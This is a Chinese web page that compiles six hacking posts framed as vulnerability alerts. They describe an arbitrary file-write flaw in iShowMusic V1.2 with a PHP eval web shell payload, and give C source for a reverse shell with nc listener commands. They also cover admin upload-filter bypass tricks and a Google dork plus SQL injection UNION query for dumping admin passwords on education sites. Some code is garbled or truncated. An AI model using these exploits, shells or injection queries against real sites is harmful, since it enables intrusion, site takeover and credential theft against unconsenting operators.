“大唐一点坏”通过精心收集,向本站投稿了6篇iShowMusic V1.2 直接写shell漏洞漏洞预警,下面是小编整理后的iShowMusic V1.2 直接写shell漏洞漏洞预警,欢迎您能喜欢,也请多多分享。

iShowMusic V1.2 直接写shell漏洞漏洞预警

篇1:iShowMusic V1.2 直接写shell漏洞漏洞预警

By qiur3n

iShow Music 是一套基本于PHP+TXT的在线音乐播放程序,程序采用文本数据存储方式,无需MYSQL数据库支持,同时程序代码与界面模板分离,方便你的音乐网站界面修改。

:www.ishowsky.cn

在error.php 12-26行复制内容到剪贴板代码:

elseif ($_POST['action']==“save”){

$cknumon && GdConfirm($gdcode);

if(empty($id)) {

Showmsg(“no”,“你还未选择歌曲呢!”,“返回重新填写”,“javascript.:history.back(-1)”); exit;}

elseif(empty($_POST['user'])) {

Showmsg(“no”,“你还没写名字呢!”,“返回重新填写”,“javascript.:history.back(-1)”); exit;}

else{

$user=safeconvert($user);

$line=“$user|$songname|$id|$errmsg|$timestamp|\n”;

$e=“$datadir/error.php”;

writetofile($e,$line,“a+”);

Showmsg(“yes”,“提交成功,谢谢您的支持!”,“关闭本页”,“javascript.:window.close”); exit;

}在global.php 27-34行复制内容到剪贴板代码:

foreach($_POST as $_key=>$_value){

$_POST[$_key]=str_replace(array('|','$','..'),array

('|','$','..'),$_POST[$_key]);

!ereg(“^\_”,$_key) && !$$_key && $$_key=$_POST[$_key];

}

foreach($_GET as $_key=>$_value){

$_GET[$_key]=str_replace(array('|','$','..'),array

('|','$','..'),$_GET[$_key]);

!ereg(“^\_”,$_key) && !$$_key && $$_key=$_GET[$_key];

}这段代码是允许在register_globals在off的情况下工作

程序作者的意图应该是把post和get提交的值过滤一下吧,这里手误把$_POST[$_key]给过滤了.

导致失去了这段代码本来的作用.

function writetofile($file_name, $data, $method = “w”)

{

$filenum = fopen($file_name, $method);

flock($filenum, LOCK_EX);

$file_data = fwrite($filenum, $data);

fclose($filenum);

return $file_data;

}

这个函数也没有任何过滤就把$data写进去了,呵呵

hxxp://www.xxx.com/error.php?errid=1&errtitle=

然后提交一下你就能获得一个shell在

hxxp://www.xxx.com/data/error.php ($datadir默认为/data/,建议用这程序的管理员把这个默认值和文

件夹改名,呵呵)

刚经群里的朋友提示,发现这段代码并没有错误复制内容到剪贴板代码:

foreach($_POST as $_key=>$_value){

$_POST[$_key]=str_replace(array('|','$','..'),array

('|','$','..'),$_POST[$_key]);

!ereg(“^\_”,$_key) && !$$_key && $$_key=$_POST[$_key];

}

foreach($_GET as $_key=>$_value){

$_GET[$_key]=str_replace(array('|','$','..'),array

('|','$','..'),$_GET[$_key]);

!ereg(“^\_”,$_key) && !$$_key && $$_key=$_GET[$_key];

}呵呵..虽然我在本地本地测试的时候确实没替换.

现在修改哈Ryat提供的邪恶的shellcode..嘿嘿

hxxp://www.xxx.com/error.php?errid=1&errtitle=

这样你在访问一次hxxp://www.xxx.com/data/error.php后将得到hxxp://www.xxx.com/data/wolvez.php的测试文件

内容为

篇2:iShowMusic V1.2 直接写shell漏洞

By qiur3n

iShowMusic V1.2 直接写shell漏洞漏洞预警www.wolvez.org/

-06-17

iShow Music 是一套基本于PHP+TXT的在线音乐播放程序,程序采用文本数据存储方式,无需MYSQL数据库支持,同时程序代码与界面模板分离,方便你的音乐网站界面修改。

:www.ishowsky.cn

在error.php 12-26行

复制内容到剪贴板

代码:

elseif ($_POST['action']==“save”){

$cknumon && GdConfirm($gdcode);

if(empty($id)) {

Showmsg(“no”,“你还未选择歌曲呢!”,“返回重新填写”,“javascript.:history.back(-1)”); exit;}

elseif(empty($_POST['user'])) {

Showmsg(“no”,“你还没写名字呢!”,“返回重新填写”,“javascript.:history.back(-1)”); exit;}

else{

$user=safeconvert($user);

$line=“$user|$songname|$id|$errmsg|$timestamp|\n”;

$e=“$datadir/error.php”;

writetofile($e,$line,“a+”);

Showmsg(“yes”,“提交成功,谢谢您的支持!”,“关闭本页”,“javascript.:window.close()”); exit;

}

在global.php 27-34行

复制内容到剪贴板

代码:

foreach($_POST as $_key=>$_value){

$_POST[$_key]=str_replace(array('|','$','..'),array

('|','$','..'),$_POST[$_key]);

!ereg(“^\_”,$_key) && !$$_key && $$_key=$_POST[$_key];

}

foreach($_GET as $_key=>$_value){

$_GET[$_key]=str_replace(array('|','$','..'),array

('|','$','..'),$_GET[$_key]);

!ereg(“^\_”,$_key) && !$$_key && $$_key=$_GET[$_key];

}

这段代码是允许在register_globals在off的情况下工作

程序作者的意图应该是把post和get提交的值过滤一下吧,这里手误把$_POST[$_key]给过滤了.

导致失去了这段代码本来的作用.

function writetofile($file_name, $data, $method = “w”)

{

$filenum = fopen($file_name, $method);

flock($filenum, LOCK_EX);

$file_data = fwrite($filenum, $data);

fclose($filenum);

return $file_data;

}

这个函数也没有任何过滤就把$data写进去了,呵呵

www.xxx.com/error.php?errid=1&errtitle=

然后提交一下你就能获得一个shell在

www.xxx.com/data/error.php ($datadir默认为/data/,建议用这程序的管理员把这个默认值和文

件夹改名,呵呵)

篇3:linux 反弹shell漏洞预警

#include 

#include

#include

#include

#include

#include

#include

void usage;

char shell[]=“/bin/sh”;

char message[]=“s8s8 welcome\n”;

int sock;

int main(int argc, char *argv[]) {

if(argc <3){

usage(argv[0]);

}

struct sockaddr_in server;

if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

printf(“Couldn't make socket!\n”); exit(-1);

}

server.sin_family = AF_INET;

server.sin_port = htons(atoi(argv[2]));

server.sin_addr.s_addr = inet_addr(argv[1]);

if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) {

printf(“Could not connect to remote shell!\n”);

exit(-1);

}

send(sock, message, sizeof(message), 0);

dup2(sock, 0);

dup2(sock, 1);

dup2(sock, 2);

execl(shell,“/bin/sh”,(char *)0);

close(sock);

return 1;

}

void usage(char *prog[]) {

printf(“\t\ts8s8 connect back door\n\n”);

printf(“\t sql@s8s8.net\n\n”);

printf(“Usage: %s

\n”, prog);

exit(-1);

}

gcc -o f f.c

再在本机上监听一个端口

nc -l -p 8888

再执行./f 192.168.1.14 8888

注:反弹回来的 shell没提示符,

linux 反弹shell漏洞预警

篇4:常用的后台上传拿shell漏洞预警

有的时候进入后台了,拿shell也可能是你羁绊,有编辑器的话,再具体说吧,万一编辑器是精简版的或者是漏洞修补的FCK,只能利用一些小的上传点了,可不要小看这些上传点。

能不能利用的NC提交,其实NC提交已经反锁了,利用opera浏览器或者使用suitbute更为简洁。那一般说来什么情况下可以如此使用呢,看源代码

出现类似filepath value=”upload”就爽歪歪了,试着修改value=“upload.asp;”

出现类似filename value =”1312321321″  ,试着修改value=”1312321321.asp”

如果还不行的可是在后面加上一个空格或者;试试

篇5:教育站漏洞批量拿shell漏洞预警

教育站打印页面漏洞

google搜索 inurl:info_Print.asp?ArticleID=

默认后台:website/ad_login.asp

爆管理员密码:

union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin

经过测试,大部分都可以爆出来,解下MD5就一路顺风~

篇6:iShowMusic V1.2 写入shell漏洞漏洞预警

前几天公布的漏洞了,这几天比较忙,今天才看到,刚好前段时间用这套程序做了个音乐站,在自己的站里测试成功了,顺便也补了下漏洞。

--------

漏洞描述:

iShow Music 是一套基本于PHP+TXT的在线音乐播放程序。程序采用文本数据存储方式,无需MYSQL数据库支持,同时程序代码与界面模板分离,方便你的音乐网站界面修改。在error.php 12-26行

PHP代码

elseif ($_POST['action']==“save”){$cknumon && GdConfirm($gdcode);if(emptyempty($id)) {Showmsg(“no”,“你还未选择歌曲呢!”,“返回重新填写”,“javascript.:history.back(-1)”); exit;}elseif(emptyempty($_POST['user'])) {Showmsg(“no”,“你还没写名字呢!”,“返回重新填写”,“javascript.:history.back(-1)”); exit;}else{$user=safeconvert($user);$line=“$user|$songname|$id|$errmsg|$timestamp|\n”;$e=“$datadir/error.php”;writetofile($e,$line,“a+”);Showmsg(“yes”,“提交成功,谢谢您的支持!”,“关闭本页”,“javascript.:window.close()”);  exit;}在global.php 27-34行

PHP代码

foreach($_POST as $_key=>$_value){$_POST[$_key]=str_replace(array('|','$','..'),array('|','$','..'),$_POST[$_key]);!ereg(“^\_”,$_key) && !$$_key && $$_key=$_POST[$_key];}foreach($_GET as $_key=>$_value){$_GET[$_key]=str_replace(array('|','$','..'),array('|','$','..'),$_GET[$_key]);!ereg(“^\_”,$_key) && !$$_key && $$_key=$_GET[$_key];}这段代码是允许在register_globals在off的情况下工作程序作者的意图应该是把post和get提交的值过滤一下吧,这里手误把$_POST[$_key]给过滤了.导致失去了这段代码本来的作用.

PHP代码

function writetofile($file_name, $data, $method = “w”){$filenum = fopen($file_name, $method);flock($filenum, LOCK_EX);$file_data = fwrite($filenum, $data);fclose($filenum);return $file_data;}这个函数也没有任何过滤就把$data写进去了

<*参考By qiur3n

www.wolvez.org/*>

测试方法:

[www.sebug.net]

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

www.xxx.com/error.php?errid=1&errtitle=<?eval($_POST[wst]);?>然后提交一下你就能获得一个shell在www.xxx.com/data/error.php ($datadir默认为/data/,建议用这程序的管理员把这个默认值和文件夹改名,呵呵)
阅读剩余 0%
本站所有文章资讯、展示的图片素材等内容均为注册用户上传(部分报媒/平媒内容转载自网络合作媒体),仅供学习参考。 用户通过本站上传、发布的任何内容的知识产权归属用户或原始著作权人所有。如有侵犯您的版权,请联系我们反馈本站将在三个工作日内改正。